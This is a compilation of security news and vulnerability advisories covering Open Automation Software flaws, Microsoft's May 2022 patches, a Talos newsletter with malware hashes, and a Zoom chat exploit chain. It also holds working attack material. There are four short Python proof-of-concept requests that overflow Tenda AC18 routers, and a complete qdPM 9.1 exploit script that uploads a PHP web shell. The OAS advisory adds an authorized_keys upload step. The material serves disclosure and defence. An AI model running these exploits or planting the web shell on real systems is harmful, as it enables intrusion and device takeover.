Cisco Talos discovered eight vulnerabilities in the Open Automation Software, two of them critical, that pose risk for critical infrastructure networks.

Cisco Talos discovered eight vulnerabilities in the Open Automation Software, two of them critical, that pose risk for critical infrastructure networks.

Critical flaws in a popular platform used by industrial control systems (ICS) that allow for unauthorized device access, remote code execution (RCE) or denial of service (DoS) could threaten the security of critical infrastructure.

Researchers Jared Rittle of Cisco Talos discovered a total of eight vulnerabilities—two of them critical–in the Open Automation Software (OAS) Platform, the most serious of which allows an attacker to execute arbitrary code on a targeted machine, according to a blog post published this week. The flaws affect Open Automation Software OAS Platform, version 16.00.0112.

OAS—offered by a company of the same name–makes it easy to transfer data between proprietary devices and applications, including both software and hardware. At its core is what’s called a Universal Data Connector, which allows the “movement and transformation of data for critical business processes like machine learning, data mining, reporting and data visualization,” according to the OAS website.

The OAS Platform is widely used in systems in which a range of disparate devices and software need to communicate, which is why it’s often found in ICS to connect industrial and IoT devices, SCADA systems, network points, and custom apps and APIs, among other software and hardware. Some companies using the platform include Intel, Mack Trucks, the U.S. Navy, JBT AeroTech and Michelin.

****Critical Infrastructure at Risk****

The OAS Platform’s presence in these systems is why the flaws can be incredibly dangerous, observed one security professional, noting that these devices are often those responsible for the operation of highly sensitive processes involved in critical industries like utilities and manufacturing.

“An attacker with the ability to disrupt or alter the function of those devices can inflict catastrophic damage on critical infrastructure facilities,” Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel, wrote in an email to Threatpost.

What can be especially dangerous in ICS attacks is that they may not be immediately obvious, which can make them hard to detect and allow them to inflict significant damage while operators are none the wiser, he said.

Clements cited the now-infamous Stuxnet worm that propagated more than 10 years ago as an example of how much destruction an ICS threat can cause if it flies under the radar.

Stuxnet “was a case study on these risks, as it didn’t immediately break the industrial control devices it targeted but altered their function in such a way to cause critical industrial components to eventually catastrophically fail, all while falsely reporting back to monitoring systems that everything was operating normally,” he said.

** **The Vulnerabilities****

Of the flaws in OAS discovered by Cisco Talos, the one with the most critical rating on the CVSS (9.4) is being tracked as CVE-2022-26833, or TALOS-2022-1513. It’s an improper authentication flaw in the REST API in OAS which could allow an attacker to send a series of HTTP requests to gain unauthenticated use of the API, researchers said.

However, what’s being deemed by researchers as the most serious of the flaws earned a 9.1 rating on the CVSS and is being tracked as CVE-2022-26082, or TALOS-2022-1493. CVE-2022-26082 is a file write vulnerability in the OAS Engine SecureTransferFiles functionality that could allow an attacker to execute arbitrary code on the targeted machine through a specially-crafted series of network requests.

The other vulnerabilities that Cisco Talos discovered earned ratings of high severity. The flaw that could lead to DoS is being tracked as CVE-2022-26026 or TALOS-2022-1491, and is found in the OAS Engine SecureConfigValues functionality of the platform. It can allow an attacker to create a specially-crafted network request that can lead to loss of communications.

Two other vulnerabilities, CVE-2022-27169 or TALOS-2022-1494 and CVE-2022-26067 or TALOS-2022-1492, can allow an attacker to obtain a directory listing at any location permissible by the underlying user by sending a specific network request, researchers wrote.

Another information disclosure vulnerability tracked as CVE-2022-26077 or TALOS-2022-1490, works in the same way, researchers said. However, this flaw also provides the attacker with a list of usernames and passwords for the platform that could be used in future attacks, they said.

The other two vulnerabilities could allow an attacker to make external configuration changes, including the ability to create a new security group and/or new user accounts arbitrarily on the platform. They are being tracked as CVE-2022-26303 or TALOS-2022-1488, and CVE-2022-26043 or TALOS-2022-1489.

****Updates Urged, but May Take Time****

Cisco Talos worked with OAS to resolve the issues and urged those affected to update as soon as possible. Affected users also can mitigate the flaws by ensuring that proper network segmentation is in place which will give adversaries a low level of access to the network on which the OAS Platform communicates, researchers noted.

Although updating systems is the best way to protect against potential attacks when vulnerabilities exist, it’s not often a quick and easy task, especially for ICS operators, security experts noted.

In fact, due to the nature of the systems, it’s an “immensely disruptive” task to take industrial systems offline, which is why ICS patches are often delayed for months or years, Clements said.

Critical Flaws in Popular ICS Platform Can Trigger RCE

Hello everyone! This episode will be about Microsoft Patch Tuesday for May 2022. Sorry for the delay, this month has been quite intense. As usual, I’m using my Vulristics project and going through not only the vulnerabilities that were presented on May 10th, but all the MS vulnerabilities presented by Microsoft since the previous Patch […]

Hello everyone! This episode will be about Microsoft Patch Tuesday for May 2022. Sorry for the delay, this month has been quite intense. As usual, I’m using my Vulristics project and going through not only the vulnerabilities that were presented on May 10th, but all the MS vulnerabilities presented by Microsoft since the previous Patch Tuesday, April 12th.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239089

I have set direct links in comments\_links.txt for Qualys, ZDI and Kaspersky blog posts.

    $ cat comments_links.txt
    Qualys|May 2022 Patch Tuesday: Microsoft Releases 75 Vulnerabilities with 8 Critical; Adobe Releases 5 Advisories, 18 Vulnerabilities with 16 Critical|https://blog.qualys.com/vulnerabilities-threat-research/2022/05/10/may-2022-patch-tuesday
    ZDI|THE MAY 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/5/10/the-may-2022-security-update-review
    Kaspersky|Actively exploited vulnerability in Windows|https://www.kaspersky.com/blog/windows-actively-exploited-vulnerability-cve-2022-26925/44305/
    
    $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "May" --mspt-comments-links-path "comments_links.txt"  --rewrite-flag "True"
    ...
    MS PT Year: 2022
    MS PT Month: May
    MS PT Date: 2022-05-10
    MS PT CVEs found: 73
    Ext MS PT Date from: 2022-04-13
    Ext MS PT Date to: 2022-05-09
    Ext MS PT CVEs found: 38
    ALL MS PT CVEs: 111
    ...

Let’s see the report.

*   All vulnerabilities: 110
*   Urgent: 0
*   Critical: 1
*   High: 27
*   Medium: 69
*   Low: 13

The most dangerous and the only critical vulnerability of this month was actually presented between Patch Tuesdays. **Memory Corruption** in Microsoft Edge/Chromium (CVE-2022-1364). Exploitation in the wild for this vulnerability was mentioned on AttackerKB website and it is also in CISA Known Exploited Vulnerabilities Catalog. “Google is aware that an exploit for this vulnerability exists in the wild”. This is a first example of the new Vulristics functionality. The CVSS Base Score for this vulnerability was added from a third party site, WhiteSource, because it was not available on NVD.

The most dangerous and most hyped vulnerability among those that were presented directly on Patch Tuesday day is **Spoofing** in Windows Local Security Authority (LSA) (CVE-2022-26925). The vulnerability can affect all Windows operating systems from Windows 7 (Windows Server 2008 for server systems) and later. It received a CVSSv3 score of 8.1. However, when chained with a new technology LAN manager (NTLM) relay attack, the combined CVSSv3 score for the attack chain is 9.8. According to the advisory from Microsoft, it has been exploited in the wild as a zero-day. An unauthenticated attacker could force domain controllers to authenticate to an attacker-controller server using NTLM. Raphael John, who has been credited by Microsoft for reporting this vulnerability revealed on Twitter that the vulnerability is actually the bug known as PetitPotam (CVE-2021-36942) from August 2021. “The story behind CVE-2022-26925 is no advanced reverse engineering, but a lucky accident. During my pentests in January and March, I saw that PetitPotam worked against the \[domain controllers\]”. It looks like Microsoft failed to properly fix the PetitPotam vulnerability.

There were 10 **Remote Code Execution** in Windows LDAP this month. But VM vendors specify CVE-2022-22012 and CVE-2022-29130, because of the biggest CVSS Base Scores, 9.8. An unauthenticated attacker could send a specially crafted request to a vulnerable server. Successful exploitation could result in the attacker’s code running in the context of the SYSTEM account. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. Systems with the default value of this policy would not be vulnerable.

**Remote Code Execution** in Windows Network File System (CVE-2022-26937). This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). NFS version 4.1 is not impacted by this vulnerability and Microsoft provides the recommended workaround of disabling NFS versions 2 and 3 for those users who are not able to immediately apply the patch. Exploitability Assessment: Exploitation More Likely.

**Remote Code Execution** in Windows Remote Desktop Client (CVE-2022-22017). An attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim’s system in the context of the targeted user. Exploitability Assessment: Exploitation More Likely.

**Elevation of Privilege** in Windows Print Spooler (CVE-2022-29104, CVE-2022-29132). These are just the latest in a long line of EoP vulnerabilities Microsoft has addressed in Print Spooler over the last year, several of which have been exploited in attacks.

An interesting situation has developed around **Elevation of Privilege** in Kerberos (CVE-2022-26931) and **Elevation of Privilege** in Active Directory (CVE-2022-26923). Patches for these vulnerabilities caused service authentication problems when deployed on Windows Server domain controllers. But within a week the problem was resolved. Microsoft released workaround and additional updates for domain controllers.

All vulnerabilities in this episode do not have a public exploit, but there are some that have a mark about “Proof-of-Concept Exploit” in the Microsoft CVSS Temporal Score. Therefore, it is more likely that exploits for them will appear soon.

*   **Spoofing** – Microsoft Edge (CVE-2022-29147)
*   **Denial of Service** – Windows Hyper-V (CVE-2022-22713)
*   **Information Disclosure** – Windows Clustered Shared Volume (CVE-2022-29123)

The full report is available here: ms\_patch\_tuesday\_may2022\_report

Hi! My name is Alexander and I am an Information Security Automation specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

Microsoft Patch Tuesday May 2022: Edge RCE, PetitPotam LSA Spoofing, bad patches

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
Given the recent tragedies in the U.S., I don’t feel it’s appropriate to open by being nostalgic or trying to be witty — let’s just stick to some security news this week.    The one big...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Given the recent tragedies in the U.S., I don’t feel it’s appropriate to open by being nostalgic or trying to be witty — let’s just stick to some security news this week.  

**The one big thing **

The BlackByte ransomware group uses its software for its own goals and as a ransomware-as-a-service offering to other criminals. This actor and its affiliates have infected victims all over the world, from North America to Colombia, the Netherlands, China, Mexico and Vietnam. BlackByte updated its leak site with a new design and new victims and is still actively exploiting victims worldwide.   

> **Why do I care? **
> 
> Talos has been monitoring BlackByte for several months and we can confirm they are still active after the FBI released a joint cybersecurity advisory in February 2022. Additionally, BlackByte is considered part of the big game ransomware groups, which are targeting large, high-profile targets, looking to exfiltrate internal data and threatening to publicly release it. Like similar groups, they have their own leaks site on the darknet. 
> 
> **So now what? **It's more important now than ever to have a multi-layered security architecture to detect these types of attacks. The adversary is likely to manage to bypass one of the other cybersecurity measures, but it is much harder for them to bypass all of them. There’s also a ton of IOCs you can add to any block lists that we have listed on our blog, as well as previous Snort rules and ClamAV signatures to protect against this threat actor.   

**Other news of note**

The ongoing battle between the Conti ransomware gang and Costa Rica continued this week, with Costa Rica’s president saying his government is “at war” with Conti. Meanwhile, Conti seems to have dissolved and is now broken up between several sub-groups, though Conti actors continue to release statements on Costa Rica. This massive ransomware attack on a country’s government has other smaller states worried they could be the next ransomware target. Many services in Costa Rica have been inoperable for weeks after the Conti attack. (Tech Monitor, The Verge, TechCrunch) 

Several state-sponsored actors in Europe and the Middle East are buying the “Predator” spyware from commercial surveillance company Cytrox to spy on Android users. Researchers from Google say they’ve spotted these actors operating in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia. The firm sold the spyware along with exploits for zero-day vulnerabilities in the Chrome web browser and Android operating system, which are now all patched. (Google Threat Analysis Group, Gizmodo) 

Zoom patched an XMPP vulnerability chain that could lead to remote code execution, along with several other security vulnerabilities in the virtual meeting client. A security researcher discovered an attack chain in which an attacker sends messages to the target over Zoom chat with the XMPP protocol — no user interaction is required. If successful, the attacker could then execute remote code on the targeted machine. Other vulnerabilities Zoom disclosed this week included an issue that could allow an adversary to send user session cookies to a non-Zoom domain, which could allow for spoofing. (Security Week, Google Project Zero) 

**Can’t get enough Talos? **

*   Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
*   CTA Board of Directors Spotlight: Matt Watchinski, Cisco Talos
*   People Behind CSR at Cisco: How JJ Cummings protects people in Ukraine from cyberthreats
*   Threat Roundup for May 13 - 20
*   Talos Takes Ep. #97: MustangPanda stays agnostic

  

**Upcoming events where you can find Talos ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** 1fce2981e0d7d9c85adeea59a637d77555b466d6a6639999c6ae9b254c12dc6b    
**MD5:** f5d20b351d56605bbb51befee989fa6e  **Typical Filename:** lavasoft\_overlay\_new\_setup\_progress\_en.exe    
**Claimed Product:** PF001's Installer    
**Detection Name:** W32.8B439CC5BF-95.SBX.TG  

**SHA 256:** 818d2d5bdde999f70563c16bfa9c724897d3b01adc67089137ae97d8f7ab6ba3    
**MD5:** 9b1f8a838b5c195f9cf2f11017e38175  **Typical Filename:** document-launch-powershell.xls    
**Claimed Product:** N/A   **Detection Name:** Auto.818D2D.242455.in02 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa   **MD5:** df11b3105df8d7c70e7b501e210e3cc3   **Typical Filename:** DOC001.exe   **Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

Threat Source newsletter (May 26, 2022) — BlackByte adds itself to the grocery list of big game hunters

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetClientState request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetClientState page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetClientState.

In function formSetClientState it reads user provided parameter deviceId into v9, and this variable is passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/SetClientState, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetClientState?"
url += "limitEn=1&deviceId=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30477)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30477: VulnRepo/IoT/Tenda/4 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg it reads user provided parameter firewallEn into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer dest.

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetFirewallCfg?"
url += "firewallEn=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30476)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30476: VulnRepo/IoT/Tenda/6 at master · lcyfrank/VulnRepo

Tenda AC Seris Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function fromAddressNat

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v9 and v8, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/addressNat?"
url += "entrys=" + "s" \* 0x200
url += "&mitInterface=" + "a" \* 0x200

response \= requests.get(url)

**Timeline**

*   2022-05-05: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30472)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30472: VulnRepo/IoT/Tenda/1 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a heap overflow in the httpd module when handling /goform/saveParentControlInfo request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/saveParentControlInfo page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **heap overflow** vulnerability in function saveParentControlInfo.

In function saveParentControlInfo it reads user provided parameter deviceId into src, and this variable is passed into function strcpy without any length check, which may overflow the heap-based buffer ptr.

So by requesting the page /goform/saveParentControlInfo, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/saveParentControlInfo?"
url += "deviceId=" + "s" \* 0x1000

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30474)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30474: VulnRepo/IoT/Tenda/5 at master · lcyfrank/VulnRepo

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A file write vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Open Automation Software OAS Platform V16.00.0112

**Product URLs**

OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-306 - Missing Authentication for Critical Function

**Details**

The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.

By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to upload an arbitrary file to any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.

Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.

Once the required Security Group and User Account credentials have been obtained, a file of choice can be uploaded to the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. A valid SecureTransferFiles command resembles the following:

    0000   00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00   ..)^.b........E.
    0010   02 b6 00 00 40 00 40 06 a2 4f c0 a8 0a 6a c0 a8   ....@.@..O...j..
    0020   0a 38 c4 ea e5 67 18 9e 24 8a 19 e0 9f df 80 18   .8...g..$.......
    0030   08 0a b5 4d 00 00 01 01 08 0a 36 5a a0 6d d6 19   ...M......6Z.m..
    0040   2e 41 00 00 00 00 00 d0 83 40 00 01 00 00 00 ff   .A.......@......
    0050   ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00   ................
    0060   03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13   ................
    0070   53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69   SecureTransferFi
    0080   6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00   les.............
    0090   00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c   .............Mal
    00a0   69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20   iciousUser..... 
    00b0   31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59   1MZJ2XTeAwi88+aY
    00c0   78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78   xbU07v+k4GWJiVPx
    00d0   09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07   ................
    00e0   00 00 00 10 07 00 00 00 04 00 00 00 08 08 01 00   ................
    00f0   00 00 06 08 00 00 00 13 2f 68 6f 6d 65 2f 6f 61   ......../home/oa
    0100   73 75 73 65 72 2f 2e 73 73 68 2f 06 09 00 00 00   suser/.ssh/.....
    

When a successful SecureTransferFiles command is received, a response similar to the following will be returned:

    0000   00 00 00 00 00 80 44 40 00 01 00 00 00 ff ff ff   ......D@........
    0010   ff 01 00 00 00 00 00 00 00 10 01 00 00 00 02 00   ................
    0020   00 00 06 02 00 00 00 07 53 75 63 63 65 73 73 0a   ........Success.
    0030   0b                                                .
    

With file upload functionality successful, various approaches can be taken to get access to the system. The proof-of-concept here uploads a new authorized_keys file to the oasuser’s .ssh directory, after which it is possible to gain access to the system via a ssh command like the following: ssh -i id_rsa oasuser@192.168.1.10

**Mitigation**

The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.

**Vendor Response**

released as version 16.00.0113

https://openautomationsoftware.com/downloads/

**Timeline**

2022-03-15 - Vendor Disclosure  
2022-05-22 - Vendor Patch Release  
2022-05-25 - Public Release  

Discovered by Jared Rittle of Cisco Talos.

CVE-2022-26082: TALOS-2022-1493 || Cisco Talos Intelligence Group

Google has disclosed a nasty set of six bugs affecting Zoom chat that can be chained together for MitM and RCE attacks, no user interaction required.

A vulnerability chain discovered in Zoom's chat functionality can be exploited to allow zero-click remote code execution (RCE), threat hunters have revealed.

Google's Project Zero uncovered an attack path that would allow cyber adversaries to silently force a victim to connect to a man-in-the-middle (MitM) server — no user action needed. From there, attackers can intercept and modify client update requests and responses in order to send the victim a malicious update, which will automatically download and execute, thus allowing RCE.

The only capability needed to carry this off successfully is the ability to send messages to the victim over Zoom chat, Project Zero researcher Ivan Fratric noted in a posting that was made public on Tuesday.   

"With the massive popularity and broad reach of Zoom, any vulnerability that could allow a remote compromise like this is of concern," Mike Parkin, senior technical engineer at Vulcan Cyber, tells Dark Reading. "While an attack appears to require the threat actor to be on an active Zoom call with the target, the wide prevalence of the platform and the number of large group meetings means it shouldn’t be difficult for a malicious actor to find suitable victims."  

**XMPP "Stanza Smuggling" Bug  
**Zoom chat uses a messaging protocol based on XML called XMPP. Fratric explained that messages are exchanged using short snippets of XML called "stanzas" that are sent over a single stream back and forth from client to server. The initial issue is the fact that the client and server don't see eye-to-eye when interpreting whether message code is well formed, leading to parsing inconsistencies.

"The clients use gloox library for XML parsing … and Zoom's server … uses fast\_xml for XML parsing, which in turn uses an XML parser called Expat," the researcher noted. "Indeed, it turns out that Expat and gloox parse XML in a different way and (at least one) exploitable inconsistency exists."

At issue is the fact that the server's Expat parser is lax when it comes to validating tag and attribute names, Fratric said. Specifically, it will forward tag names containing question marks (i.e., "<?xml ?>") to the client, even though it shouldn't. And when the client's gloox parser sees the question-mark sequence, it will reset the parser state so that anything coming after that will be considered a legitimate root node of the next stanza.

This makes it possible to escape the <message> tag safeguards, he noted, to add in whatever content the attacker would like: "The <message> tag here can, of course, be replaced with <iq> or any other tag and it will be accepted by the client as the data coming from the server." He dubbed this "stanza-smuggling."

Since attackers now have complete control over the message tag, that also means they can manipulate the "from" attribute, in order to spoof messages as if coming from another user. And, Fratric noted, they can also lead the victim's contacts to malicious websites for phishing or drive-by malware attacks. This is accomplished by altering the file-integration tag, to surreptitiously replace the URL that's opened when the user wants to share a file with another user, using Dropbox, Google Drive, SharePoint, and other cloud-based services.  

**Achieving Man-in-the-Middle Status  
**The MitM attack is accomplished by changing the <strem:error> tag. Using a specially crafted stanza, bad actors can create "a 'ClusterSwitch' task in the Zoom client, with an attacker-controlled 'web domain' as a parameter," Fratric said.

To trigger the attack, adversaries can simply type and send a message to the victim containing the magic string "iddqd" in the tag. That will cause the victim client to connect to the /clusterswitch endpoint on the attacker-provided domain, thus setting up the ability to see and modify traffic between the client and the Zoom Web server.

"From /clusterswitch endpoint, a client gets a list of domains to be used for various services," Fratric explained. "Since the attacker is already in the man-in-the-middle position, they can replace any of the domains with their own, acting as a reverse proxy and intercepting communications."

**Exploiting the Client Update Process  
**The escalation to arbitrary code execution was a logical next step, Fratric noted, given that Zoom clients will periodically query the update endpoint from Zoom's Web server to see if there's anything new to install.

"Since the attacker is already in the MitM position, they can, of course, replace these endpoints and serve arbitrary data," according to the researcher.

